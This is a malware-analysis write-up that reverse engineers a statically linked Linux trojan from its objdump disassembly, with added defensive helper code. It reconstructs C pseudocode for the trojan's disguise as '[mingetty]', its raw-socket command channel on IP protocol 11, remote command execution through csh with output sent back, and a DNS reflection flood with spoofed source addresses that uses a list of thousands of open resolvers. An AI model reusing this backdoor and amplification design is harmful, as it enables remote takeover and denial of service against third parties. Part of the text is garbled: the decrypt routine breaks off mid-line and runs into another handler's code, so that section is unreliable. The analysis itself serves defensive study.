file(1) reveals that the binary is a statically linked x86 Linux ELF executable.
I will analyze this binary based on the output of

  $ objdump -drs the-binary > dump

(The -r is superfluous in this case, but my fingers are used to it.)

A hastily hacked together perl script (findsyscalls.pl) reveals the
syscall wrapper routines in the binary:

  80569fc: wait4(pid_t, int *, int, struct rusage *)
  8056a2c: accept(int s, struct sockaddr *, socklen_t *)
  8056a74: bind(int, struct sockaddr *, socklen_t)
  8056abc: connect(int, struct sockaddr *, socklen_t)
  8056b04: listen(int, int backlog)
  8056b44: Syscall: 102 - 10 (RECV)
  8056b90: Syscall: 102 - 12 (RECVFROM)
  8056bf0: Syscall: 102 - 9 (SEND)
  8056c3c: sendto(sock,msg,len,flags,sockaddr_in to,tolen)
  8056c9c: Syscall: 102 - 14 (SETSOCKOPT)
  8056cf4: socket(AF_INET,SOCK_RAW,IPPROTO_RAW)
  8057134: chdir(const char*)
  8057160: close(int)
  805718c: dup2(int,int)
  80571b8: Syscall: 11 (execve)
  80571e8: fork()
  805720c: geteuid()
  8057230: getpid()
  8057254: gettimeofday(struct timeval *, struct timezone *)
  8057280: Syscall: 54 (ioctl)
  80572b0: kill(pid_t,int)
  80572dc: open(char*,int flags,int mode)
  805730c: read(int,char*,size_t)
  805733c: setsid()
  8057360: sigprocmask(int how, const sigset_t *, sigset_t *)
  8057390: uname(struct utsname *buf)
  80573bc: unlink(const char*)
  80573e8: write(int,const char*,size_t)
  8057418: alarm(int)
  8057444: time(time_t*)
  8057470: Syscall: 146 (writev)
  80574a0: Syscall: 82 (select)
  80574c8: sigaction(int sig, const struct sigaction *, struct sigaction *)
  805751c: sigsuspend(const sigset_t *mask)
  8057554: exit(int)
  8065cec: Syscall: 90 (mmap)
  8065d50: Syscall: 106 (stat)
  8065d8c: Syscall: 108 (fstat)
  80660f4: Syscall: 55 (fcntl)
  8066124: Syscall: 19 (lseek)
  8066154: Syscall: 91 (munmap)
  8066180: Syscall: 145 (readv)
  80661b0: Syscall: 163 (mremap)
  80661e8: Syscall: 45 (brk)
  8066230: Syscall: 45 (brk)

Without looking any closer, I'd guess one of the brk is brk and the other is sbrk.
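findsyscalls.pl itself is not reproduced in these notes, so the following is only a sketch of the idea, not the script. It assumes the wrappers load the syscall number with "mov $imm32,%eax" (opcode b8) shortly before "int $0x80" (cd 80), which is the usual i386 Linux convention. The names scan_syscalls, syscall_hit and socketcall_name are made up for illustration. A raw byte scan like this can misfire on data that happens to contain b8 or cd 80, so treat hits as candidates to check against the disassembly.

```c
#include <stddef.h>
#include <stdint.h>

/* Sub-function names for socketcall(2), i.e. syscall 102 on i386 Linux.
   The sub-function number is what the list above shows as "102 - N". */
static const char *const socketcall_names[] = {
    NULL, "socket", "bind", "connect", "listen", "accept",
    "getsockname", "getpeername", "socketpair", "send", "recv",
    "sendto", "recvfrom", "shutdown", "setsockopt", "getsockopt",
    "sendmsg", "recvmsg"
};

const char *socketcall_name(unsigned call)
{
    size_t n = sizeof socketcall_names / sizeof socketcall_names[0];
    if (call == 0 || call >= n)
        return "?";
    return socketcall_names[call];
}

/* One candidate syscall site (hypothetical type, for illustration only). */
struct syscall_hit {
    size_t   int80_off;  /* offset of the "cd 80" bytes in the buffer */
    uint32_t nr;         /* immediate loaded into %eax before it */
};

/* For every "int $0x80" in code[], look back at most `window` bytes for the
   nearest "mov $imm32,%eax" and record its immediate as the syscall number.
   Returns the number of hits stored in out[] (at most max_out). */
size_t scan_syscalls(const unsigned char *code, size_t len, size_t window,
                     struct syscall_hit *out, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len && n < max_out; ++i) {
        if (code[i] != 0xcd || code[i + 1] != 0x80)
            continue;
        size_t lo = i > window ? i - window : 0;
        for (size_t j = i; j-- > lo; ) {
            /* b8 plus a 4-byte little-endian immediate must end before i */
            if (code[j] == 0xb8 && j + 5 <= i) {
                out[n].int80_off = i;
                out[n].nr = (uint32_t)code[j + 1]
                          | (uint32_t)code[j + 2] << 8
                          | (uint32_t)code[j + 3] << 16
                          | (uint32_t)code[j + 4] << 24;
                ++n;
                break;
            }
        }
    }
    return n;
}
```

Fed the bytes of a wrapper such as "b8 0b 00 00 00 cd 80", the scanner reports syscall 11 (execve). For hits with number 102, the value loaded into %ebx still has to be read from the disassembly and passed to socketcall_name().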
Let's see who calls execve (80571b8): 80555fc and 80557e8.

  80555fc: execl()

The routine starts by allocating a 32k buffer on the stack. The
fingerprint matches execl.o from libc 5; glibc does it much more
elaborately. So this binary is a statically linked libc 5 binary!

  80557e8: system()

This routine is so close that I guess it's also from libc. Syscall
annotation shows lots of signal stuff, and the fingerprint matches system()
from libc5. Obviously, this binary is a really quick hack.

The syscalls shows a .fini and a .start section. libc5 always puts the
same in those:

  8048110: __do_global_dtors_aux
  80675a8: __do_global_ctors_aux

The obvious next step is to create a dump of libc5 for cross reference.
First thing we do is solve the brk puzzle.

  80661e8: __sbrk()
  8066230: __brk()

Now let's look for some central functions, like malloc and getenv.
getenv is easy to spot, because it contains a characteristic "cmpb 0x3d,",
and it is good to have identified because it also references environ and
calls strncmp.

  8055668: getenv()
  806d228: __environ
  8057b04: strncmp

Now that we have a variable, it is time to extend annotate so it can also
annotate constants. The easiest constant is errno, of course.

  8078b14: errno

Mhh. This libc was apparently compiled without thread support. That
makes cross referencing a little more difficult (no __errno_location).

Humm. Casual browsing for variables finds this:

  8048590: e8 53 ec 00 00   call 0x80571e8     /* Syscall: 2 (fork) */
  8048595: a3 70 e7 07 08   mov %eax,0x807e770 /* 0x807e770 == ??? */

So it's a good guess that

  807e770: backdoor_child_pid

Back to the central functions. strlen is pretty important and should be
easy to recognize. Unfortunately, gcc -O won't produce calls to it, it
will simply inline "repnz scas". Too bad. :-(

  8057adc: strcmp

Moving to some more casual observations. The code calls unlink once,
before exiting:

  8048705: 68 e6 75 06 08   push $0x80675e6    /* 0x80675e6 == ???
*/
  804870a: e8 ad ec 00 00   call 0x80573bc     /* Syscall: 10 (unlink) */

so it's a safe bet that 0x80675e6 points to some buffer with a file name.

  80675e6: file_name_to_unlink

Grepping for this offset shows that it is never written, just read. So
this is probably something like

  const char* my_file_name="whatever";

But wait, objdump can also write a hex dump. The hex dump reveals the
constant to be "/tmp/.hj237349".

  80675e6: "/tmp/.hj237349"

Directly before that string, right at the start of .rodata, is another
interesting string: "[mingetty]". This looks like a sensible string to
write over argv[0].

  80675d8: "[mingetty]"

This offset is referenced exactly once, at 80481aa, right before calling
fork. The code does not call strcpy, however, but it copies four 32-bit
words manually.

Anyway, let's extract some more constants for annotate.pl:

  80675f5: "/bin/csh -f -c \"%s\" 1> %s 2>&1"
  8067614: "rb"
  8067617: "TfOjG"
  806761d: "\xff\xfb\x01"
  8067621: "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:."
  8067651: "PATH"
  8067656: "HISTFILE"
  806765f: "linux"
  8067665: "TERM"
  806766a: "sh"
  806766d: "/bin/sh"
  8067675: "/bin/csh -f -c \"%s\" "
  806768a: "%d.%d.%d.%d"
  80678f3: "RESOLV_HOST_CONF"

Oh, "rb". That reeks of fopen, freopen or fdopen. At 8048620 it's called
with the magic /tmp file name, so it's fopen.

  804f620: fopen()

The next call there pushes a small number (count?) and a 1 as middle two
arguments of four, so it's fread or fwrite. The result is used as index
and \0 is written, so this looks like zero-terminating the result of fread.

  804f6d4: fread()

Just before unlink, the FILE* is once again used as single argument to a
function, which is probably fclose then.

  804f540: fclose()

Now I want to identify malloc. fclose probably calls it. The libc5
sources show that fclose calls _IO_file_close_it and free and references
stdin, stdout and stderr.
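As an aside on the string constants above: turning an address from the disassembly into the string that the hex dump shows is just an offset calculation against the section's load address. The helper below is a sketch under that assumption; section_string is a made-up name, and the caller is expected to supply the section bytes and base address as reported by objdump.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Return the NUL-terminated string stored at virtual address `addr` inside
   a section that was loaded at `sec_base`, or NULL if the address lies
   outside the section or the string is not terminated within it. */
const char *section_string(const unsigned char *sec, size_t sec_len,
                           uint32_t sec_base, uint32_t addr)
{
    if (addr < sec_base || addr - sec_base >= sec_len)
        return NULL;
    size_t off = addr - sec_base;
    if (memchr(sec + off, 0, sec_len - off) == NULL)
        return NULL;
    return (const char *)(sec + off);
}
```

With .rodata starting at 80675d8, address 80675e6 is offset 14, which is exactly where "/tmp/.hj237349" sits if "[mingetty]" and its terminator occupy the first 11 bytes.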
  8060d44: _IO_file_close_it()
  805c290: free()
  80786fc: stdin
  8078750: stdout
  80787a4: stderr

Now, free() and malloc() are probably linked in side by side. Let's look
at the bowels of the libc5 malloc:

  805bb34: __free_hook

Not so easy. Let's go for the other constants.

  80678c4: "gethostby*.getanswer: asked for..."

The good thing about the DNS routines is that they reference stuff all
over the place, and in a very deterministic order if one has access to the
libc sources.

  804b800: static struct hostent* getanswer()
  804f7ec: printf()
  804dfe0: res_query(qbuf,C_IN,T_PTR,buf,sizeof(buf))
  804e180: res_search(name,C_IN,T_A,buf,sizeof(buf))
  807e788: h_errno
  804f808: sprintf()
  804c234: gethostbyaddr()
  804a9d8: init_services() [dns helper]
  805e954: libc_nls_init()
  8079dd4: service_order[]
  8067b77: "%u.%u.%u.%u.in-addr.arpa"
  807854c: _res.options
  8078514: spoof [dns]
  8056640: strcpy()
  8078520: numtrimdomains [dns]
  804bf80: gethostbyname()
  8056450: bcmp()
  8078518: spoofalert
  80552b0: openlog()
  805e584: catgets()
  8054eb0: syslog()
  804a580: trim_domains()
  804f680: fprintf()
  8067950: " ,;:"
  8057b30: strpbrk()
  8067913: "r"
  8067904: "/etc/host.conf"
  804f5c4: fgets()
  8057be8: rindex()
  8067915: "order"
  8056570: memmove()
  80568d0: strtok()
  8056664: strdup(const char*)
  8067b57: "hosts.byname"
  804c6fc: _gethtbyname(const char*)
  8056954: gethostname(char* name,sizeof name)
  80565f8: strcasecmp(const char*,const char*)
  8056480: bcopy(const void*,void*,size_t)
  804cb94: _gethtbyaddr(const char *addr, int len, int type)
  804c574: _endhtent()
  804c538: _sethtent()
  804c5a4: _gethtent()
  8054db8: rewind()
  804ce8c: inet_addr()
  805d5f8: yp_get_default_domain(char* domain)
  805d3a8: yp_match(domain, map, name, strlen(name), &result, &resultlen)
  805d638: yp_first(domain, map, &keyname, &keylen, &result, &resultlen)
  805d814: yp_next(domain, map, keyname, keylen, &keyname,&keylen, &result, &resultlen)
  8057970: index/strchr(const char*, char)

Gee, that wasn't bad for a bunch of DNS routines which were 100%
identified by a few error message constants...

Now that we have strdup, we also have malloc and memcpy:

  805bd74: malloc(size_t)
  805652c: memcpy(void*,const void*,size_t)

Let's look inside fgets() to get the missing string functions.

  804f734: _IO_getline()
  8061a70: __underflow()
  80575c0: memchr(const void *, int, size_t)

We still need realloc().

  804d744: res_init()
  80785a4: res_status
  805680c: strncpy()

That should be enough to understand what this program does.

Unsurprisingly, .text begins with crt1.o from libc5. objdump -dr crt1.o
gives us a few more symbols:

  8078b18: __fpu_control
  805756c: __setfpucw()
  8056d44: __libc_init()
  80675d0: _fini
  8055f08: atexit()
  8048080: _init()
  8048134: main()
  8055fbc: exit()
  8048100: done [crt1]

Looking at main, we see a function at 8057764 called, which we didn't
identify yet. A quick look at the disassembly shows that it's memset.

  8057764: memset(void*,int,size_t)

main uses a lot of temporary variables. It is time to extend annotate.pl
again.

  main/0x8: argc
  main/0xc: argv[0]
  main/0xfffff800: u.recvbuf[2048]
  main/0xfffff814: u.p.s
  main/0xfffff816: u.p.rest
  main/0xfffff000: unsigned char plaintext[2048]
  main/0xffffee48: struct in_addr IPs[10]
  main/0xffffbb44: char buf7[255];
  main/0xffffbb40: int yes (1, for setsockopt);
  main/0xffffbb3c: socklen_t addrlen == sizeof(sockaddr_in);
  main/0xffffbb38: int sock
  main/0xffffbb30: ptr1 (init u.recvbuf)
  main/0xffffbb2c: ptr2 (init &u.p.s)
  main/0xffffbb28: ptr3 (init &u.p.rest)
  main/0xffffbb20: ptr4 (init plaintext)
  main/0xffffbb1c: ptr5 (init IPs)
  80569bc: signal(int,sighandler_t); 0=DFL, 1=IGN
  80559a0: srandom(int seed)
  80675e3: "/"
  807e774: child_pid (init 0)
  807e778: activity_mode (init 0)

activity_mode is written in several places, each time right in the
beginning of a protocol handler, with the number of the handler as
constant, i.e. "case 11: activity_mode=11;" That's why I guess it is
meant to keep state on what mode the program currently is in.
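The main/0x... entries above are %ebp-relative displacements as objdump prints them, i.e. unsigned 32-bit values. Reading them as signed numbers makes the frame layout easier to check. The two helpers below are a small sketch for that; frame_disp and frame_delta are names I made up, they are not part of annotate.pl.

```c
#include <stdint.h>

/* Interpret a displacement as printed by objdump (e.g. 0xfffff800) as a
   signed offset relative to %ebp. Small positive values (0x8, 0xc) are
   arguments, large values are locals below the frame pointer. */
int32_t frame_disp(uint32_t raw)
{
    /* Written out by hand to avoid an implementation-defined conversion. */
    return raw <= INT32_MAX ? (int32_t)raw : -(int32_t)(~raw) - 1;
}

/* Distance in bytes from one frame slot to another. */
int32_t frame_delta(uint32_t from, uint32_t to)
{
    return frame_disp(to) - frame_disp(from);
}
```

For example, 0xfffff800 is %ebp-2048, so recvbuf[2048] ends right at the frame pointer. u.p.s at 0xfffff814 lies 20 bytes into recvbuf (directly after a 20-byte IP header) and u.p.rest lies 22 bytes in. plaintext at 0xfffff000 is %ebp-4096 and its 2048 bytes end exactly where recvbuf starts.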
  int unk1;
  pid_t backdoor_child_pid;
  int unk2;

  main(int argc,char* argv[]) {
    union {
      char recvbuf[2048];
      struct {
        struct iphdr h;
        short s;
        char rest[2026];
      } p;
    } u;
    unsigned char plaintext[2048];
    struct in_addr IPs[10];
    char* ptr1=u.recvbuf;
    char* ptr2=&u.p.s;
    char* ptr3=&u.p.rest;
    socklen_t addrlen=sizeof(struct sockaddr_in);
    int sock;

    if (geteuid()) exit(-1);
    memset(argv[0],0,strlen(argv[0]));
    strcpy(argv[0],"[mingetty]");
    /* 80481cc */
    signal(SIGCHLD,SIG_IGN);
    if (fork()) exit(0);
    setsid();
    signal(SIGCHLD,SIG_IGN);
    if (fork()) exit(0);
    /* 804820c */
    chdir("/");
    close(0); close(1); close(2);
    /* so far this looks like daemon() */
    backdoor_child_pid=0;
    unk1=0;
    unk2=0;
    srandom(time(0));
    /* this srandom is a guess. It looks a little like my libc5 srandom,
       but not completely. It shares the constant 0x3039 with it, and it
       is called several times with time(0) as argument, so guessing
       srandom is not completely arbitrary */
    sock=socket(AF_INET,SOCK_RAW,0xb);
    /* 0xb is not a well-known protocol. */

    /* now for the "cover my ass" area */
    signal(SIGHUP,SIG_IGN);
    signal(SIGTERM,SIG_IGN);
    signal(SIGCHLD,SIG_IGN);
    signal(SIGCHLD,SIG_IGN); /* yes, twice, probably a cut and paste error */
    /* 8048297 */
    ptr4=plaintext;
    ptr5=IPs;
    int esi=recv(sock,u.recvbuf,0x800,0); /* I guess sizeof(recvbuf)==0x800 */
    for (;;) {
      if (u.p.h.protocol==0xb && u.p.rest[0]==2 && esi>0xc8) {
        /* the trigger is to receive an IP packet with protocol 11, where
           the protocol header has a 2 byte at offset 2, and which is more
           than 200 bytes long */
        /* 80482fa */
        decrypt(esi-22,u.p.rest,plaintext);
        /* the esi-22 throws away the IP header (20 bytes) and the short.
           I guess the short is there for alignment reasons.
*/
        switch (plaintext[1]) {
        /* switch table:
             804835c (1)
             80483f0 (2)
             8048590 (3)
             804871c (4)
             80487c8 (5)
             8048894 (6)
             8048acc (7)
             8048b58 (8)
             8048b80 (9)
             8048c34 (10)
             804d808 (11)
             8048de4 (12)
             8048eb8 (default)
        */
        }
      }
      /* 8048eb8 */
      usleep(10000); /* 1/100 sec */
    }
  }

This code uses a raw socket to read IP packets with protocol 11 from the
network, which are at least 200 bytes long. It then decrypts them with
the moronic rot23 scheme and dispatches the command, which is specified by
the second byte in the decrypted payload.

  804a1e8: decrypt(int len,char* code,char* plaintext)
  80678bf: "%c%s"
  80675e5: (char)0

The decryption routine at 804a1e8 is very convoluted and obfuscated. It
took me several iterations to understand it. This is a simple version:

  void decrypt(int len,const unsigned char* code,unsigned char* plaintext) {
    int i;
    for (i=0; i %s 2>&1",plaintext,"/tmp/.hj237349");
    system(u.recvbuf);
    FILE* f=fopen("/tmp/.hj237349","rb");
    if (f) {
      edi=0;
      ptr6=buf6;
      ecx=f;
      do {
        esi=fread(u.recvbuf,1,398,f);
        u.recvbuf[esi]=0;
        memcpy(plaintext+2,u.recvbuf,398);
        if (edi==0) {
          /* 8048689 */
          plaintext[1]=3;
          edi=1;
        } else {
          /* 804869c */
          plaintext[1]=4;
        }
        /* 80486a3 */
        encrypt(398,ptr4,buf6);
        /* 80486bb */
        SendNPackets(IPs,buf6,(rand()%201)+400);
        /* 80486e4 */
        usleep(400000);
      } while(esi==0);
      /* 80486f9 */
      fclose(f);
      unlink("/tmp/.hj237349");
    }
    /* 0x8048712 */
    exit(0);
  }

It's pretty obvious what this code does. It dissociates itself from its
father, then runs the decrypted payload as command through csh. The
output of the command is saved to the magic temp file and sent back as
encrypted spread spectrum answer through SendNPackets.

Why the first child sleeps and then sends itself a kill -9 is not obvious
to me. It may be some BSD legacy magic for process group dissociation or
it may be that the author actually intended it the other way around, i.e.
kill the grandchild after 10 seconds.
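Before moving on to the other handlers, the trigger condition from the receive loop in main is worth writing down in a form that could be used on the defensive side, e.g. in a capture filter or a test harness. This is a sketch derived from the pseudocode above, not code from the binary. It assumes, like the pseudocode does, a 20-byte IP header without options. The names is_trigger_packet and encrypted_len are made up.

```c
#include <stddef.h>

enum {
    TRIGGER_PROTO = 0x0b, /* IP protocol number the raw socket listens on */
    PROTO_OFF     = 9,    /* offset of the protocol field in the IP header */
    PAYLOAD_OFF   = 22,   /* 20-byte IP header plus the 2-byte short */
    MIN_LEN       = 0xc8  /* packet must be longer than 200 bytes */
};

/* Returns 1 if the raw IPv4 packet would pass the test
   "u.p.h.protocol==0xb && u.p.rest[0]==2 && esi>0xc8", else 0. */
int is_trigger_packet(const unsigned char *pkt, size_t len)
{
    if (len <= MIN_LEN)
        return 0;
    if (pkt[PROTO_OFF] != TRIGGER_PROTO)
        return 0;
    return pkt[PAYLOAD_OFF] == 2;
}

/* Number of bytes handed to decrypt(), i.e. the "esi-22" above. */
size_t encrypted_len(size_t len)
{
    return len - PAYLOAD_OFF;
}
```

Since protocol 11 is not something a normal host should ever see, any packet for which is_trigger_packet() returns 1 is a strong hint that somebody is talking to one of these zombies.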
  main/0xffffbb24: FILE* f
  main/0xffffee70: buf6
  main/0xffffbb18: ptr6 (init buf6)

Let's continue with case 4.

Case 4 does nothing if child_pid is not 0. It is initialized to zero in
main. It then records its number (4) in activity_mode, forks, and writes
the pid of the child to child_pid. The child then does the following:

  /* 8048745 */
  memcpy(buf7,plaintext,255);
  /* 804875c */
  memmove(buf7,buf7+9,255);
  /* 8048777 */
  func_8049174(plaintext[2],plaintext[3],plaintext[4],plaintext[5],0,
               plaintext[6],plaintext[7],plaintext[8],buf7);
  /* 80487c0 */
  exit(0);

Let's look at func_8049174. At first glance, it opens a raw socket, calls
random() several times, contains a sleep for 5 minutes, and apparently
does an infinite loop around sendto and usleep. It has all the hallmarks
of a flooding routine, so let's call it do_flood. Since it has so many
parameters, those probably determine the header. The memmove removes the
bytes that were used as parameters, which probably leaves the intended
payload behind.

  8049174: do_flood(ip0,ip1,ip2,ip3,flag,arg1,arg2,arg3,hostname)

I don't think it is necessary to find out what the function does exactly,
but let's verify one thing: the first four arguments are type char. It
may be an IP number. Let's look at the sendto arguments. The packet is
in a local buffer at fffff9c8, the first four arguments are copied to
fffff9d4, which is in that buffer at offset 12, which is the offset of the
source IP in an IP header. Just to make sure, let's see if the first byte
is set to 0x45 again: yep, at 80493f7.
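The two checks just made (source IP at offset 12, first byte 0x45) can be read straight off the IPv4 header layout. The struct below is a plain sketch of that layout with my own field names, in the spirit of struct iphdr. It is only meant for looking up offsets, not for building packets.

```c
#include <stddef.h>
#include <stdint.h>

/* IPv4 header without options; byte offsets in the comments. */
struct ipv4_hdr {
    uint8_t  ver_ihl;   /*  0: version (high nibble), header length in words */
    uint8_t  tos;       /*  1 */
    uint16_t tot_len;   /*  2 */
    uint16_t id;        /*  4 */
    uint16_t frag_off;  /*  6 */
    uint8_t  ttl;       /*  8 */
    uint8_t  protocol;  /*  9 */
    uint16_t check;     /* 10 */
    uint32_t saddr;     /* 12: source IP */
    uint32_t daddr;     /* 16: destination IP */
};

/* Decode the first header byte, e.g. 0x45 -> version 4, 20 header bytes. */
unsigned ip_version(uint8_t ver_ihl)      { return ver_ihl >> 4; }
unsigned ip_header_bytes(uint8_t ver_ihl) { return (ver_ihl & 0x0fu) * 4u; }
```

offsetof(struct ipv4_hdr, saddr) is 12, which matches fffff9d4 minus fffff9c8, and 0x45 decodes to IP version 4 with a 5-word (20-byte) header.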
  do_flood/0x8: ip0
  do_flood/0xc: ip1
  do_flood/0x10: ip2
  do_flood/0x14: ip3
  do_flood/0x18: flag
  do_flood/0x1c: arg1
  do_flood/0x20: arg2
  do_flood/0x24: arg3
  do_flood/0x28: hostname
  8049174: do_flood(srcip[0],srcip[1],srcip[2],srcip[3],flag,sport[0],sport[1],usehostname,hostname)

  int sendto(int s, const void *msg, size_t len, int flags,
             const struct sockaddr *to, socklen_t tolen);

  do_flood/0xfffff9a8: raw_sock (sendto argument)
  do_flood/0xfffff9c8: void* msg (sendto argument)
  do_flood/0xfffffdd8: struct sockaddr to (sendto argument)
  do_flood/0xfffff9d4: source ip in IP header in msg

OK, so we now know the source address. But where does the code send the
packet? At 80491ef, the code writes a 2 to the first word of struct
sockaddr, which is AF_INET, so it's actually a sockaddr_in.

  do_flood/0xfffffdd8: struct sockaddr_in to (sendto argument)

sin_port is set to 0 (80491f8), and the IP is set to the IP the pointer at
0xfffff994 points to. This pointer is incremented by 4 at 804951a, so it
points to an array of IPs which the routine iterates through. The end of
the array is marked by a 0.0.0.0 IP, which is tested in 8049521.

  do_flood/0xfffff994: pointer_to_destination_ip

This pointer is initialized to 0x806d22c, which is the first
preinitialized variable in the .data segment, right after __environ (which
is referenced from the startup code and thus linked in before the
variables in the main program). This list is zero terminated.

Now this is interesting. The list is, as I said, zero terminated. The
first zero IP is at 0x80784f0, which makes the list a whopping 45764 bytes
or 11441 IPs big! Just to make sure, I did DNS lookups on the first and
last IP in the list:

  2.130.0.12.in-addr.arpa domain name pointer www.connell-lp.com
  114.194.91.80.in-addr.arpa domain name pointer portal.pelitec.net.ru

Oi! Now either that man has made himself a _long_ list of enemies, or
this is not supposed to be a flood routine but rather a beacon routine
where the trojan announces its presence.
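The size of the list and the names used for the two lookups are easy to double-check. The sketch below redoes the arithmetic and builds the in-addr.arpa name with the same format string that was found in the binary. The function names are mine, and the IP is assumed to be stored in network byte order, i.e. 12.0.130.2 as the bytes 12, 0, 130, 2.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Number of 32-bit entries between the first entry and the terminator. */
size_t table_entries(uint32_t first_addr, uint32_t terminator_addr)
{
    return (terminator_addr - first_addr) / sizeof(uint32_t);
}

/* The same count done the way do_flood walks the list: stop at 0.0.0.0. */
size_t count_until_zero(const uint32_t *list, size_t max_entries)
{
    size_t n = 0;
    while (n < max_entries && list[n] != 0)
        ++n;
    return n;
}

/* Build the reverse lookup name for an IPv4 address given as four bytes in
   network order. Returns what snprintf returns. */
int reverse_name(const unsigned char ip[4], char *out, size_t out_len)
{
    return snprintf(out, out_len, "%u.%u.%u.%u.in-addr.arpa",
                    (unsigned)ip[3], (unsigned)ip[2],
                    (unsigned)ip[1], (unsigned)ip[0]);
}
```

table_entries(0x806d22c, 0x80784f0) gives 0xb2c4 / 4 = 11441, and the bytes 12, 0, 130, 2 turn into "2.130.0.12.in-addr.arpa", the first name looked up above.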
I am just running a reverse DNS lookup filter over the IP list, and it
contains a ton of big and important DNS servers. One of our local DNS
servers is also part of the list. I sent a mail to the admin asking
whether they had noticed any unusual traffic, I'm curious what he'll have
to say.

I poked around a little with the IPs and I found out that those are not
just DNS servers, those are open DNS relays, i.e. they will happily answer
queries for anyone. That gives more weight to the beacon theory, because
with open DNS relays, you can alert yourself about installed zombies
without a direct contact. All you have to do is own an authoritative DNS
server, say "compromised.net", and then tell your zombie using a control
packet with a spoofed source IP to ask his public DNS servers for
[base64(hisip)].compromised.net. This way, a traffic analysis on the
compromised host will not reveal the IP of the controller unless the
zombie is still running and the traffic analysis looks into the DNS
packets.

Back to do_flood.

  do_flood/0xfffff9bc: copy of srcip[0]
  do_flood/0xfffff9b8: copy of srcip[1]
  do_flood/0xfffff9b4: copy of srcip[2]
  do_flood/0xfffff9b0: copy of srcip[3]
  do_flood/0xfffff9a4: pointer to UDP header

Well, it makes sense to send DNS packets to DNS servers. So let's have a
look at those constants in .rodata which this routine happens to touch.
It copies 9 words from 8067698. Those look like a bunch of small numbers.
After it is stuff that looks like garbage but upon closer inspection is
half assembled DNS packets!

DNS queries start with a 16-bit sequence number (476e or "Gn" here), then
\001\000 to mark it a query and say you want the resolver to do recursion
for you, then a \000\001 as 16-bit query record count (you normally ask
for one record) and three 16-bit counters that are all zero. Then comes
the real query in DNS encoding (i.e. [length byte][query string], i.e.
"usc.edu" becomes \003usc\003edu\000).
After that come the record type and class as big endian 16-bit value (in
this case SOA and IN (6 and 1)). And upon closer inspection the small
numbers suddenly make sense: they are the lengths of the individual
packets!

Now, how does this make sense? The code uses raw sockets to be able to
spoof the source IP of the DNS queries. It appears to make sure it sends
correct DNS queries, so the servers will answer. And it has a list of
11000 DNS servers. This only makes sense if it is a double-indirect
flood! The attacker tells his zombie to send out DNS requests to public
DNS servers with the spoofed source IP of the victim host to be flooded,
and the packets that kill the poor victim do not come from the zombie
itself but from the public DNS servers!

In effect, this is a DDoS tool that is practically impossible to defend
against, because you can't cut the traffic to all the public DNS servers,
most of them are vital to the infrastructure. I.e. if you cut the traffic
from the wired.com DNS servers, your clients cannot read Wired's internet
publication or send email to them! Plus, you can't see who is causing it,
because each DNS server will probably only see several spoofed queries
per minute from each zombie, so the signal will drown in the noise.

The only defense currently is to configure your DNS servers not to relay
answers or at least block queries for

  IN SOA .com
  IN SOA .net
  IN SOA .de
  IN SOA .edu
  IN SOA .org
  IN SOA .usc.edu
  IN SOA .es
  IN SOA .gr
  IN SOA .ie

This list looks quite strange to me. Greece, Spain and Ireland are not
traditionally known for their big bandwidth. Also, why aren't there any
Asian TLDs in here? Is the author an American? ;)

The DNS sequence number is randomized. This is funny because the DNS
sequence number is initialized as "Gn" in the static DNS queries, so
either the author just put a captured DNS packet there or he put his
initials there?
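To double-check a blob from .rodata against the query layout described above (12-byte header, length-prefixed name, type, class), a small decoder helps. This is a sketch of a decoder for single-question queries without name compression. It is not taken from the binary, and parse_dns_query and struct dns_question are names I made up.

```c
#include <stddef.h>
#include <stdint.h>

struct dns_question {
    uint16_t id, flags, qdcount; /* from the 12-byte header */
    char     name[256];          /* dotted name, e.g. "usc.edu" */
    uint16_t qtype, qclass;      /* e.g. 6 (SOA) and 1 (IN) */
};

static uint16_t be16(const unsigned char *p)
{
    return (uint16_t)(p[0] << 8 | p[1]);
}

/* Decode the header and the first question of a DNS query.
   Returns 0 on success, -1 if the packet is truncated or malformed. */
int parse_dns_query(const unsigned char *p, size_t len, struct dns_question *q)
{
    size_t off = 12, n = 0;

    if (len < 12)
        return -1;
    q->id      = be16(p);
    q->flags   = be16(p + 2);
    q->qdcount = be16(p + 4);

    for (;;) {
        if (off >= len)
            return -1;
        unsigned label = p[off++];
        if (label == 0)              /* root label terminates the name */
            break;
        if (label > 63 || off + label > len ||
            n + label + 1 >= sizeof q->name)
            return -1;
        if (n)
            q->name[n++] = '.';
        for (unsigned i = 0; i < label; ++i)
            q->name[n++] = (char)p[off++];
    }
    q->name[n] = '\0';

    if (off + 4 > len)
        return -1;
    q->qtype  = be16(p + off);
    q->qclass = be16(p + off + 2);
    return 0;
}
```

A query for the SOA record of usc.edu built by hand from the description comes out at 12 + 9 + 4 = 25 bytes, which is the kind of small number one would expect to find in the length table.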
  806d22c: uint32_t public_dns_servers[]
  8067698: attack dns packet length table
  80676bc: attack dns packet table
  do_flood/0xffffffdc: local copy of attack dns packet length table
  do_flood/0xfffff9ac: some_flag (init 1)
  do_flood/0xfffffde8: local copy of attack dns table
  do_flood/0xfffff9dc: first byte after IP header (udp source port?)
  do_flood/0x1c: sport[0]
  do_flood/0x20: sport[1]
  do_flood/0x24: bool usehostname

  do_flood(srcip[0],srcip[1],srcip[2],srcip[3],flag,sport[0],sport[1],usehostname,hostname) {
    char lc_dnslen[9*4];  /* local copy of dns length table */
    char lc_dnstab[500];  /* local copy of dns table */
    char msg[1024];       /* message to be sent out with sendto */
    short* udp_header;
    char* udp_payload;
    struct sockaddr_in si;
    int raw_sock;
    int local_intptr1, iterations_to_dns_lookup;
    uint32_t local_ipofhostname;
    int some_flag;
    uint32_t* pointer_to_destination_ip;

    /* 80491a4 */
    memcpy(lc_dnslen,dnslen,9*4);   /* length table at 8067698 */
    some_flag=1;
    memcpy(lc_dnstab,dnstab,500);   /* packet table at 80676bc */
    /* 80491d1 */
    esi=msg;
    udp_header=&msg[20];   /* udp source port? */
    udp_payload=&msg[28];  /* udp payload, i.e. start of DNS data */
    /* 80491ef */
    si.sin_family=AF_INET;
    si.sin_port=0;
    if (flag) --flag;
    /* 0x804920a */
    raw_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
    if (raw_sock>0) {
      local_intptr1=iterations_to_dns_lookup=0;
      memset(msg,0,1024);
      /* 804924d */
      for (;;) {
        do { /* call gethostbyname until it resolves!1!! */
          edi=0;
          if (usehostname && iterations_to_dns_lookup<1) {
            struct hostent* edx=gethostbyname(hostname);
            /* 804926f */
            if (edx==0) {
              sleep(600);
